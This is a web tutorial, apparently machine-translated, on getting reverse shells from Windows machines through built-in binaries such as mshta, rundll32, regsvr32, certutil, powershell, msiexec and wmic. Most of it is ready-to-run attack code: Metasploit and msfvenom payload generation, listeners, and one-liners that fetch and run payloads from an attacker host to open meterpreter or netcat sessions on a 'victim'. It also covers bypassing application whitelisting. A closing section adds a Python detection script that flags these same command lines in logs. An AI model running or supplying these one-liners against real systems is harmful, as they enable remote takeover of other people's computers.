How to use Windows one-liners to obtain a reverse shell

2025-01-18 Update From: SLTechnology News&Howtos


Shulou(Shulou.com)06/02 Report--

How do you use a Windows one-liner to get a reverse shell? Many newcomers are not clear about this, so to help you with the problem the editor explains it in detail below; anyone who needs it can come and learn, and I hope you get something out of it.

Today we will discuss Windows one-liners: single commands that use built-in Windows programs such as PowerShell or rundll32 to obtain a reverse shell from a Windows system. Usually we find an RCE vulnerability while abusing an HTTP service or some other program; such a vulnerability lets you execute arbitrary system commands remotely. We have therefore prepared a list of Windows commands that make the target machine open a reverse connection back to you.

Mshta.exe

Mshta.exe is a program that ships with Microsoft Windows. Its full name is Microsoft HTML Application host, and it is used to execute .HTA files: HTML files that carry JavaScript or VBScript. The mshta.exe tool parses and runs these files.

Metasploit contains an "HTA Web Server" module that generates a malicious HTA file. The module hosts the HTML Application, which, when opened, runs the payload through PowerShell. When the user navigates to the HTA file, Internet Explorer prompts twice before executing the payload.

use exploit/windows/misc/hta_server
msf exploit(windows/misc/hta_server) > set srvhost 192.168.1.109
msf exploit(windows/misc/hta_server) > set lhost 192.168.1.109
msf exploit(windows/misc/hta_server) > exploit

Now, on the victim's machine (which is vulnerable to RCE), let's run the malicious HTA through mshta.exe to obtain a meterpreter session.

Once you successfully execute the malicious HTA file on the remote machine, you will get a reverse connection on your local computer (Kali Linux).

mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Rundll32.exe

Rundll32.exe is a Windows system program that loads a DLL into memory and calls a function (16-bit or 32-bit) exported from it.

Launch a Rundll32 attack through Metasploit's SMB Delivery

Metasploit also includes an "SMB Delivery" module that generates a malicious DLL file. The module serves the payload from an SMB server and prints the command that retrieves and executes it. DLL and PowerShell targets are currently supported.

use exploit/windows/smb/smb_delivery
msf exploit(windows/smb/smb_delivery) > set srvhost 192.168.1.109
msf exploit(windows/smb/smb_delivery) > exploit

Now, on the victim machine (which is vulnerable to RCE), let's run the malicious DLL through rundll32.exe to obtain a meterpreter session.

Once you have successfully executed the dll file on the remote machine, you will get a reverse connection on the local computer (Kali Linux).

rundll32.exe \\192.168.1.109\vabFG\test.dll,0

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Regsvr32.exe

The Regsvr32 command is a Windows utility for registering and unregistering COM components such as DLLs and ActiveX controls in the Windows registry. Regsvr32.exe is installed in the %systemroot%\System32 folder on Windows XP and later.

Regsvr32.exe has the following command-line options:

Syntax: regsvr32 [/s] [/u] [/n] [/i[:cmdline]]

/u - Unregister the server

/i - Call DllInstall, passing the optional [cmdline]; when used together with /u, it calls DllInstall for uninstall

/n - Do not call DllRegisterServer; this option must be used with /i

/s - Silent; message boxes are not displayed

Start Regsvr32 through Metasploit's Script Web Delivery

This module quickly starts a web server that serves a payload and prints the command to download and execute it. It bypasses application whitelisting either through the specified scripting-language interpreter or through "squiblydoo" via regsvr32.exe. The main purpose of the module is to quickly establish a session on the target computer when the attacker has to type commands manually, for example in a command-injection scenario.

The regsvr32 target uses the "squiblydoo" technique to bypass application whitelisting: the signed Microsoft binary regsvr32 requests a .sct file and then executes the PowerShell command embedded in it. Both web requests (the .sct file and the PowerShell download/execute) can occur on the same port. The "PSH (Binary)" target writes a file to disk, allowing a custom binary to be downloaded and executed.

use exploit/multi/script/web_delivery
msf exploit(web_delivery) > set target 3
msf exploit(web_delivery) > set payload windows/meterpreter/reverse_tcp
msf exploit(web_delivery) > set lhost 192.168.1.109
msf exploit(web_delivery) > set srvhost 192.168.1.109
msf exploit(web_delivery) > exploit

Copy the text in the following box

Once you have successfully executed the following regsvr32 command (which loads scrobj.dll) on the remote machine, you will get a reverse connection on your local computer (Kali Linux).

regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Certutil.exe

Certutil.exe is a command-line program installed as part of Certificate Services. We can use it to fetch our malicious exe file onto the target computer and then run it to get a meterpreter session.

Launch a certutil attack through Msfvenom

Use msfvenom to generate a malicious executable (.exe) file and start multi/handler to get the reverse shell of the victim's computer.

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f exe > shell.exe

Now, use certutil's -urlcache option to fetch the shell.exe file onto the target and run it. The syntax is as follows:

Syntax: certutil.exe [-f] [-urlcache] [-split] <path of executable file>

certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe & shell.exe

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Powershell.exe

You can start PowerShell.exe from another tool (such as cmd.exe), or from an existing PowerShell command line to start a new session. For more information, see Microsoft's official documentation.

Launch a Powercat attack through Powershell

Powercat is a PowerShell-native backdoor listener and reverse shell, described as a modified version of netcat: it integrates payload encoding (which msfvenom would otherwise do) and has a client-to-client relay that lets you connect two separate listeners.

Download powercat on the local computer, then serve powercat.ps1 to the target with a Python HTTP server, and start a netcat listener to receive the target's reverse shell.

git clone https://github.com/besimorhino/powercat.git
python -m SimpleHTTPServer 80

Then, execute the following command on the remote side to get the netcat session.

powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1'); powercat -c 192.168.1.109 -p 1234 -e cmd"

As shown below, we obtained the netcat session of the victim's machine:

Batch File

Similarly, PowerShell can execute a batch file, so let's use msfvenom to generate a malicious batch file and start a netcat listener, as follows:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=4444 > 1.bat

Then, execute the following command on the remote side to get the netcat session.

powershell -c "IEX ((New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/1.bat'))"

As shown below, we obtained the netcat session of the victim's machine:

Cscript

Similarly, PowerShell can invoke cscript.exe to run .wsf, .js and VBScript files, so let's use msfvenom to generate a malicious .vbs file and start multi/handler as the listener, as follows:

msfvenom -p cmd/windows/reverse_powershell lhost=192.168.1.109 lport=1234 -f vbs > 1.vbs

Then, execute the following command on the remote side to get the meterpreter session.

powershell.exe -c "(New-Object System.Net.WebClient).DownloadFile('http://192.168.1.109/1.vbs',\"$env:temp\test.vbs\"); Start-Process %windir%\system32\cscript.exe \"$env:temp\test.vbs\""

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Msiexec.exe

The Windows operating system includes the Windows Installer engine, which MSI packages use to install applications. The executable that interprets packages and installs products is msiexec.exe.

Launch a msiexec attack through msfvenom

Let's use the Windows Meterpreter payload to generate an MSI package file (1.msi) and start multi/handler as the listener, as follows:

msfvenom -p windows/meterpreter/reverse_tcp lhost=192.168.1.109 lport=1234 -f msi > 1.msi

Once you have successfully executed the 1.msi file on the remote machine, you will get a reverse connection on the local computer (Kali Linux).

msiexec /q /i http://192.168.1.109/1.msi

use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > set lhost 192.168.1.109
msf exploit(multi/handler) > set lport 1234
msf exploit(multi/handler) > exploit

As shown below, we successfully obtained the meterpreter session of the victim's machine:

Wmic.exe

Wmic.exe is the WMI command-line tool. Released as part of Windows XP, it provides a command-line interface to the WMI infrastructure. You can use wmic.exe to perform common WMI tasks from the command line, including browsing the CIM and checking CIM class definitions.

Launch a Wmic.exe attack through Koadic

Now a malicious XSL file will be generated with the help of Koadic, a command-and-control tool very similar to Metasploit and PowerShell Empire. For more information, see https://www.hackingarticles.in/koadic-com-command-control-framework/

After installation, run ./koadic to start Koadic and load the stager/js/wmic stager. Run the following commands, setting SRVHOST to the address the stager should call home to.

use stager/js/wmic
set SRVHOST 192.168.1.107
run

Execute the following command from WMIC to download and run the malicious XSL file from the remote server:

wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"

Once the malicious XSL file executes on the target machine, a zombie (Koadic) session is obtained.
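Every one-liner in this article has the same tell-tale shape in process-creation telemetry: a signed Windows binary (mshta, rundll32, regsvr32, certutil, powershell, msiexec, wmic) being handed a URL or UNC path it would not normally receive. As an added example that is not part of the original article, the following Python runs one detection rule per technique described above over constructed process-creation events; the "time|host|image|cmdline" record format, the hostnames and the timestamps are assumptions made for this example, not any product's format.

```python
import re

# Each rule: (technique label, regex for the process image name, regex for the command line).
# The command-line patterns mirror the article's one-liners: a script host, COM registration
# tool or installer being given a URL or UNC path instead of a local file.
RULES = [
    ("mshta_remote_hta",    r"mshta(\.exe)?",      r"https?://"),
    ("rundll32_unc_dll",    r"rundll32(\.exe)?",   r"\\\\[\w.-]+\\.*\.dll"),
    ("regsvr32_squiblydoo", r"regsvr32(\.exe)?",   r"/i:https?://.*scrobj\.dll"),
    ("certutil_urlcache",   r"certutil(\.exe)?",   r"-urlcache.*https?://"),
    ("powershell_download", r"powershell(\.exe)?", r"download(string|file)\s*\("),
    ("msiexec_remote_msi",  r"msiexec(\.exe)?",    r"/i\s+https?://"),
    ("wmic_remote_xsl",     r"wmic(\.exe)?",       r"/format:\s*\"?https?://"),
]

def classify(image, cmdline):
    """Return the technique label for one process-creation event, or None if no rule fires."""
    name = image.replace("/", "\\").rsplit("\\", 1)[-1]
    for label, proc_re, cmd_re in RULES:
        if re.fullmatch(proc_re, name, re.I) and re.search(cmd_re, cmdline, re.I):
            return label
    return None

def scan(log_text):
    """Parse 'time|host|image|cmdline' lines and return (host, label, cmdline) for each hit."""
    hits = []
    for line in log_text.strip().splitlines():
        _time, host, image, cmdline = line.split("|", 3)
        label = classify(image, cmdline)
        if label:
            hits.append((host, label, cmdline))
    return hits

# Constructed sample events (not real telemetry); the last three are benign uses of the same tools.
SAMPLE_LOG = r"""
2025-01-18T10:01:02Z|WS01|C:\Windows\System32\mshta.exe|mshta.exe http://192.168.1.109:8080/5EEiDSd70ET0k.hta
2025-01-18T10:02:10Z|WS01|C:\Windows\System32\rundll32.exe|rundll32.exe \\192.168.1.109\vabFG\test.dll,0
2025-01-18T10:03:15Z|WS02|C:\Windows\System32\regsvr32.exe|regsvr32 /s /n /u /i:http://192.168.1.109:8080/xo31Jt5dIF.sct scrobj.dll
2025-01-18T10:04:20Z|WS02|C:\Windows\System32\certutil.exe|certutil.exe -urlcache -split -f http://192.168.1.109/shell.exe shell.exe
2025-01-18T10:05:30Z|WS03|C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|powershell -c "IEX (New-Object System.Net.WebClient).DownloadString('http://192.168.1.109/powercat.ps1')"
2025-01-18T10:06:40Z|WS03|C:\Windows\System32\msiexec.exe|msiexec /q /i http://192.168.1.109/1.msi
2025-01-18T10:07:50Z|WS04|C:\Windows\System32\wbem\WMIC.exe|wmic os get /FORMAT:"http://192.168.1.107:9996/g8gkv.xsl"
2025-01-18T10:08:00Z|WS04|C:\Windows\System32\regsvr32.exe|regsvr32 /s C:\Program Files\Vendor\vendor.dll
2025-01-18T10:09:00Z|WS04|C:\Windows\System32\certutil.exe|certutil -dump C:\Users\alice\cert.cer
2025-01-18T10:10:00Z|WS01|C:\Windows\System32\msiexec.exe|msiexec /i C:\Temp\setup.msi /quiet
"""

if __name__ == "__main__":
    for host, label, cmd in scan(SAMPLE_LOG):
        print(f"{host}: {label}: {cmd}")
```

The process-name match is deliberately exact (the image basename, not a substring) so a renamed copy would be missed; pairing it with a rule on the original file name or signer information is the usual complement.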
